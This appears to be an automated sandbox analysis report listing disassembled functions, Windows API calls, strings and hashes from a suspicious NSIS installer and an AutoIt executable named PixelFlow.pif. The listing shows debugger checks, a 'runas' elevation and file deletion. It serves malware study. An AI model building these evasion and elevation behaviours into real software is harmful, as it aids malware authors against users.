lstrcmpW.KERNEL32(?,Version ), ref: 00407276
lstrcpynW.KERNEL32(?,?,?), ref: 0040728D

Strings

Version , xrefs: 0040726D

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC

Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
GlobalFree.KERNEL32(00000000), ref: 004063CA

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674

Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040492E
CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404906

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: a9e1346cc8ef0e74a40732ce9634d1443c37bf571bc6ff282ed9c774a6de9686
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: a9e1346cc8ef0e74a40732ce9634d1443c37bf571bc6ff282ed9c774a6de9686
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714

Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
CloseHandle.KERNEL32(?), ref: 00405C9D

Strings

Error launching installer, xrefs: 00405C74

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69

Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062D1, 004062D6

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E

Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Analysis Process: PixelFlow.pifPID: 6588, Parent PID: 4144COMMON

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	103

Executed Functions

Function 00615240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0061526C
IsDebuggerPresent.KERNEL32 ref: 0061527E
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 006152E6

Part of subcall function 00611821: _memmove.LIBCMT ref: 0061185B

Part of subcall function 0060BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0060BC07

SetCurrentDirectoryW.KERNEL32(?), ref: 00615366
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00650AAE
SetCurrentDirectoryW.KERNEL32(?), ref: 00650AE6
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,006B5230), ref: 00650B69
ShellExecuteW.SHELL32(00000000), ref: 00650B70

Part of subcall function 0061514C: GetSysColorBrush.USER32(0000000F), ref: 00615156
Part of subcall function 0061514C: LoadCursorW.USER32(00000000,00007F00), ref: 00615165
Part of subcall function 0061514C: LoadIconW.USER32(00000063), ref: 0061517C
Part of subcall function 0061514C: LoadIconW.USER32(000000A4), ref: 0061518E
Part of subcall function 0061514C: LoadIconW.USER32(000000A2), ref: 006151A0
Part of subcall function 0061514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006151C6
Part of subcall function 0061514C: RegisterClassExW.USER32(?), ref: 0061521C

Part of subcall function 006150DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00615109
Part of subcall function 006150DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0061512A
Part of subcall function 006150DB: ShowWindow.USER32(00000000), ref: 0061513E
Part of subcall function 006150DB: ShowWindow.USER32(00000000), ref: 00615147

Part of subcall function 006159D3: _memset.LIBCMT ref: 006159F9
Part of subcall function 006159D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00615A9E

Strings

runas, xrefs: 00650B64
AutoIt, xrefs: 00650AA3
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00650AA8

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 529118366-2030392706
Opcode ID: 5601773871a99638260e5e5127331dc6f385f3fb6cc8d0a6194b92b07edbac05
Instruction ID: c290fce17c8847e7d7166734b4038c6ece0c5b3fe93458d161dcbfb62eb13bf3
Opcode Fuzzy Hash: 5601773871a99638260e5e5127331dc6f385f3fb6cc8d0a6194b92b07edbac05
Instruction Fuzzy Hash: 61512231904248EEDB01ABB0DC46EFDBB7BEF45341F18506DF452A72A2DA784785CB28

Function 0066F8A3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00611A36: _memmove.LIBCMT ref: 00611A77

FindFirstFileW.KERNELBASE(?,?,*.*,?,?,00000000,00000000), ref: 0066F8F0
FindClose.KERNELBASE(00000000), ref: 0066FA03

Part of subcall function 006052B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006052E6

Sleep.KERNEL32(0000000A), ref: 0066F920
_wcscmp.LIBCMT ref: 0066F934
_wcscmp.LIBCMT ref: 0066F94F
FindNextFileW.KERNELBASE(?,?), ref: 0066F9ED

Strings

*.*, xrefs: 0066F8D5

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
String ID: *.*
API String ID: 2185952417-438819550
Opcode ID: 7eb1727d386d195f08abd5f40b8e216972de83346ff8fff6530a2e4b9afa1b12
Instruction ID: bff2180e91d3a23a903e215e7309213ce2f8a5b42a1636389fe068a84e136022
Opcode Fuzzy Hash: 7eb1727d386d195f08abd5f40b8e216972de83346ff8fff6530a2e4b9afa1b12
Instruction Fuzzy Hash: 0D41A27190021AAFDF54DFA4DC45BEEBBBAFF05304F14456AE814A3291EB309A84CF90

Function 00615D13 Relevance: 10.7, APIs: 7, Instructions: 223COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00615D40

Part of subcall function 00611821: _memmove.LIBCMT ref: 0061185B

GetCurrentProcess.KERNEL32(?,00690A18,00000000,00000000,?), ref: 00615E07
IsWow64Process.KERNEL32(00000000), ref: 00615E0E
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00615E54
FreeLibrary.KERNEL32(00000000), ref: 00615E5F
GetSystemInfo.KERNEL32(00000000), ref: 00615E90
GetSystemInfo.KERNEL32(00000000), ref: 00615E9C

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 2ed4c108a85c0779fa3dcf38df47d7bb8f11023b1055951ffca45d07d904417d
Instruction ID: f5b8292b781571157699015a05178ca86e9b690c159001a7c3bee984e5613262
Opcode Fuzzy Hash: 2ed4c108a85c0779fa3dcf38df47d7bb8f11023b1055951ffca45d07d904417d
Instruction Fuzzy Hash: 1491E331949BC0DED731CB6894501EAFFE66F6A300F880A5ED4C787B41D630E688C76A

Function 00663E72 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006201AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00612A58,?,00008000), ref: 006201CF

Part of subcall function 00664E59: GetFileAttributesW.KERNELBASE(?,00663A6B), ref: 00664E5A

FindFirstFileW.KERNELBASE(?,?), ref: 00663EE9
DeleteFileW.KERNEL32(?,?,?,?), ref: 00663F39
FindNextFileW.KERNEL32(00000000,00000010), ref: 00663F4A
FindClose.KERNEL32(00000000), ref: 00663F61
FindClose.KERNEL32(00000000), ref: 00663F6A

Strings

\*.*, xrefs: 00663EBB

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 0eee2ab1014ae934b32f30fd8dbfd78391e3c47814dbb7933035ac035ba35d6f
Instruction ID: a840e8defb18f50d65fb662cf5212197a7e064a53b954ba98342ce6742508719
Opcode Fuzzy Hash: 0eee2ab1014ae934b32f30fd8dbfd78391e3c47814dbb7933035ac035ba35d6f
Instruction Fuzzy Hash: 5A31A3710083559FC340EF64D8918EFB7AEBE92300F444E1EF5E182291DB35DA08C76A

Function 0060B020 Relevance: 8.1, APIs: 3, Strings: 1, Instructions: 1146COMMON

Download Yara Rule

APIs

Part of subcall function 00613740: CharUpperBuffW.USER32(?,006C61DC,00000001,?,00000000,006C61DC,?,006053A5,?,?,?,?), ref: 0061375D

_memmove.LIBCMT ref: 0060B68A

Strings

prl, xrefs: 006432A0

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: BuffCharUpper_memmove
String ID: prl
API String ID: 2819905725-4072507205
Opcode ID: 3b8b2cbb7d0037b739825c6ba648d2be9a41a25e59d0965f5ef8b21b68449454
Instruction ID: 2966d7c83af51f07e2bb9798a98b56db97b8bbcb6faebf491abbbd609a08562d
Opcode Fuzzy Hash: 3b8b2cbb7d0037b739825c6ba648d2be9a41a25e59d0965f5ef8b21b68449454
Instruction Fuzzy Hash: 81A257706483518FD768DF14C480B6BB7E2FF88304F14996DE89A8B392D771E946CB92

Function 006647B7 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0064FC06), ref: 006647C7
FindFirstFileW.KERNELBASE(?,?), ref: 006647D8
FindClose.KERNEL32(00000000), ref: 006647E8

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: df0dcfbee61c71235e2477a5c912801197ba396696def95ae5bb777603656cf2
Instruction ID: b7871a4291876d187e8ae31ae70dcbc7c04ea2a02e7a0cd84a01a60d8200250e
Opcode Fuzzy Hash: df0dcfbee61c71235e2477a5c912801197ba396696def95ae5bb777603656cf2
